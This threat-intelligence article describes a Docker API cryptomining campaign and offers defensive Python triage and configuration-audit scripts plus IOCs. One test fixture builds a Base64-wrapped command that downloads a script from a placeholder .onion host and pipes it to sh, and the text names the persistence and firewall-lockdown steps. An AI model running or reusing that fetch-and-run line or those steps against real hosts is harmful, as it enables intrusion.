A newly discovered malware campaign is targeting misconfigured Docker APIs exposed to the internet, deploying cryptominers, establishing persistence on the host, and routing payload retrieval and command-and-control through the Tor network.
First reported in June 2025 by Trend Micro’s Threat Intelligence Team as a Tor-enabled cryptominer dropper, the variant observed in Akamai Hunt honeypots in August 2025 goes further: it mounts the host filesystem into the container, locks down the host firewall automatically, and runs a Go-based dropper that orchestrates further propagation.
Evolution of Docker-targeting Malware
The initial June 2025 strain abused Docker daemons whose API was reachable over TCP port 2375 without authentication. It launched an alpine:latest container, bind-mounted the host root filesystem into it, and executed a Base64-encoded shell script fetched from a Tor .onion server.
That downloader installed curl and tor, routed its requests through socks5h://localhost:9050, and ultimately deployed an XMRig cryptominer delivered as a Zstandard-compressed binary from a second Tor endpoint.
Persistence was achieved by modifying the SSH configuration to allow root login and installing a cron job for stealthy beaconing.
The Akamai Hunt Team has now identified a variant that diverges significantly. Instead of dropping only a cryptominer, this iteration delivers a multi-tool payload including masscan, libpcap, torsocks, and custom infection logic, and then blocks port 2375 at the host level so that nothing else can reach the Docker API.
The firewall rules are re-applied from cron every minute and reject incoming TCP traffic on the Docker API port using whichever utility is available: firewall-cmd, ufw, pfctl, iptables, or nft.
This lockout tactic keeps other attackers from taking over the same host, effectively reserving the compromised instance for the threat actor’s exclusive use. It has a practical consequence for defenders: once infected, the host no longer shows port 2375 open to external scanners, so a clean scan result is not evidence that the daemon was never exposed.
Technical Breakdown and IOCs
Upon container creation, the Base64 payload installs prerequisites and fetches docker-init.sh from a Tor address. The script:
- Appends the attacker’s ECDSA public key to /root/.ssh/authorized_keys.
- Updates /etc/crontab to execute the firewall lockdown commands every minute.
- Posts a JSON beacon containing the compromised host’s IP address and architecture to a Tor-hosted C2 endpoint.
- Downloads, decompresses, and executes a Go-based “dropper” binary named system-linux-<arch>, which embeds additional tools and orchestrates masscan-driven propagation.
The Go dropper parses the utmp file to identify active login sessions, runs masscan to find hosts with port 2375 open, and, on discovery, repeats the same container-creation attack against each new target.
The binary also contains logic for infecting via Telnet (port 23) and Chromium remote debugging (port 9222), but those code paths are never invoked in the observed sample and appear to be reserved for future versions.
Indicators of compromise include unusual container deployments with host bind mounts, Base64-encoded commands that invoke tor and curl, cron entries that use firewall utilities to block port 2375, and outbound Tor connections to the .onion domains listed below.
Defenders should monitor for Docker API exposure on TCP 2375 (and, given the dormant code paths, for Telnet on 23 and Chromium remote debugging on 9222); flag newly created containers that bind-mount the host root or immediately install curl, tor, or masscan; inspect crontab for repeated firewall rule insertions and /root/.ssh/authorized_keys for unexpected entries; and block unauthorized Tor traffic.
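The three host-side indicators above (a host root bind mount, a Base64-wrapped container command that pulls in tor/curl/masscan, and cron entries that wall off TCP/2375) can be checked mechanically. The following is an added example written for this article, not Akamai’s or the campaign’s code; the `docker inspect`-style record, the stage-0 script it wraps, and the crontab lines are all constructed here, and the hidden-service name is a placeholder.

```python
"""Triage helpers for the Docker-API campaign indicators: host root bind
mounts, Base64 container commands that fetch tor/curl/masscan, and crontab
entries that block TCP/2375 with a firewall utility.

Added example; not Akamai's or the campaign's code. Sample inputs below are
constructed and mimic `docker inspect` output and /etc/crontab.
"""
import base64
import binascii
import re
from typing import Dict, List

SUSPICIOUS_TOOLS = {"tor", "curl", "masscan", "torsocks"}
FIREWALL_UTILS = {"firewall-cmd", "ufw", "pfctl", "iptables", "nft"}
# Long runs of Base64 alphabet; short tokens (flags, paths) are ignored.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_base64_args(cmd: List[str]) -> List[str]:
    """Return the decoded text of every Base64 blob found in a command vector."""
    decoded = []
    for arg in cmd:
        for blob in B64_RE.findall(arg):
            try:
                raw = base64.b64decode(blob, validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid Base64 (bad length or padding)
            decoded.append(raw.decode("utf-8", "replace"))
    return decoded


def triage_container(inspect: Dict) -> List[str]:
    """Flag the container-level indicators from one `docker inspect` record."""
    findings = []
    for mount in inspect.get("Mounts", []):
        if mount.get("Type") == "bind" and mount.get("Source") == "/":
            findings.append(f"host root bind-mounted at {mount.get('Destination')}")
    cmd = inspect.get("Config", {}).get("Cmd") or []
    for text in decode_base64_args(cmd):
        tools = sorted(t for t in SUSPICIOUS_TOOLS if re.search(rf"\b{t}\b", text))
        if tools:
            findings.append("base64 command invokes " + ", ".join(tools))
        if ".onion" in text:
            findings.append("base64 command references a .onion address")
    return findings


def triage_crontab(lines: List[str]) -> List[str]:
    """Flag crontab lines that block TCP/2375 via a firewall utility."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6 or fields[0].startswith("#"):
            continue  # comments, env assignments, malformed lines
        schedule, rest = fields[:5], " ".join(fields[5:])
        if "2375" in rest and any(u in rest for u in FIREWALL_UTILS):
            cadence = "every minute" if schedule == ["*"] * 5 else " ".join(schedule)
            findings.append(f"cron ({cadence}) blocks TCP/2375: {rest}")
    return findings


# Constructed stage-0 script modelled on the text: install curl and tor, then
# fetch the next stage through the local SOCKS proxy. Not the real payload;
# the .onion name is a placeholder.
_SAMPLE_STAGE0 = (
    "apk add --no-cache curl tor && (tor &)\n"
    "curl -x socks5h://localhost:9050 "
    "http://example-hidden-service.onion/docker-init.sh | sh\n"
)
SAMPLE_INSPECT = {
    "Config": {
        "Image": "alpine:latest",
        "Cmd": ["sh", "-c", "echo "
                + base64.b64encode(_SAMPLE_STAGE0.encode()).decode()
                + " | base64 -d | sh"],
    },
    "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostroot", "RW": True}],
}
SAMPLE_CRONTAB = [  # constructed /etc/crontab excerpt
    "SHELL=/bin/sh",
    "# m h dom mon dow user command",
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly",
    "* * * * * root iptables -I INPUT -p tcp --dport 2375 -j DROP",
    "* * * * * root command -v ufw >/dev/null 2>&1 && ufw deny 2375/tcp",
]

if __name__ == "__main__":
    for f in triage_container(SAMPLE_INSPECT) + triage_crontab(SAMPLE_CRONTAB):
        print("FINDING:", f)
```

On a live host, feed `triage_container` each record from `docker inspect $(docker ps -aq)` and `triage_crontab` the lines of /etc/crontab and /var/spool/cron; a Base64 blob that decodes to garbage is harmless here because only the decoded text is inspected.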
Restricting Docker API exposure (keeping the daemon on its Unix socket, or requiring TLS client certificates on any TCP listener), enforcing network segmentation, rotating default credentials, and locking down remote debugging ports are critical to mitigating this infection vector.
Continuous threat hunting platforms such as Akamai Hunt can detect these anomalies and stop lateral propagation before a larger botnet emerges.
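The first mitigation is a configuration question that can be answered from the daemon’s own settings. Below is an added example, written for this article rather than taken from Akamai or the Docker project, that audits a daemon.json document or a dockerd command line for a tcp:// listener without TLS client verification; the option names (`hosts`, `tlsverify`, `tlscacert`, `tlscert`, `tlskey`, `-H`) are the ones dockerd accepts, and both sample configurations are constructed.

```python
"""Audit a Docker daemon's listener configuration for the exposure this
campaign relies on: a tcp:// listener with no TLS client verification.

Added example; not Akamai's or Docker's code. Keys mirror daemon.json
(`hosts`, `tlsverify`, `tlscacert`, `tlscert`, `tlskey`) and the matching
dockerd flags. Both sample configs below are constructed.
"""
import json
from typing import Dict, List
from urllib.parse import urlsplit

TLS_FILES = ("tlscacert", "tlscert", "tlskey")

# The exposed setting the campaign scans for: API on 2375, no TLS.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

# Hardened: mandatory client certificates on the conventional TLS port.
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""


def parse_dockerd_argv(argv: List[str]) -> Dict:
    """Map a dockerd command line (as seen in `ps`) onto daemon.json-style keys.

    dockerd refuses to start when the same option appears both on the command
    line and in daemon.json, so one of the two sources is authoritative.
    """
    cfg: Dict = {"hosts": []}
    i = 1  # argv[0] is the binary
    while i < len(argv):
        key, _, val = argv[i].partition("=")
        name = key.lstrip("-")
        if key in ("-H", "--host") or name in TLS_FILES:
            if not val:  # value supplied as the next argument
                i += 1
                val = argv[i]
            if name in TLS_FILES:
                cfg[name] = val
            else:
                cfg["hosts"].append(val)
        elif name == "tlsverify":
            cfg["tlsverify"] = val.lower() != "false" if val else True
        i += 1
    return cfg


def audit_docker_daemon(cfg: Dict) -> List[str]:
    """Return findings; an empty list means no unauthenticated TCP listener."""
    findings = []
    tlsverify = bool(cfg.get("tlsverify", False))
    for h in cfg.get("hosts", []):
        if not h.startswith("tcp://"):
            continue  # unix:// and fd:// are reachable only locally
        host = urlsplit(h).hostname or "0.0.0.0"  # empty host = all interfaces
        if not tlsverify:
            scope = "loopback only" if host in ("127.0.0.1", "::1", "localhost") else "all interfaces"
            findings.append(
                f"{h}: API without TLS client auth ({scope}); "
                "any client that can connect gets root on the host"
            )
        else:
            missing = [k for k in TLS_FILES if not cfg.get(k)]
            if missing:
                findings.append(
                    f"{h}: tlsverify set but {', '.join(missing)} not configured "
                    "explicitly; dockerd falls back to ~/.docker defaults, verify they exist"
                )
    return findings


def audit_daemon_json(text: str) -> List[str]:
    """Convenience wrapper for the contents of /etc/docker/daemon.json."""
    return audit_docker_daemon(json.loads(text))


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_json(text) or ["ok"])
```

Even a loopback-only listener is reported, since any local process (including one inside a container with host networking) can reach it; the severity differs, the root-equivalence does not.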
IOCs
| IOC | Type |
|---|---|
| wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion | Domain (Tor hidden service) |
| 2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion | Domain (Tor hidden service) |
| webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207 | URL |
| c38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c (docker-init.sh) | SHA-256 |
| 649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 (system dropper binary) | SHA-256 |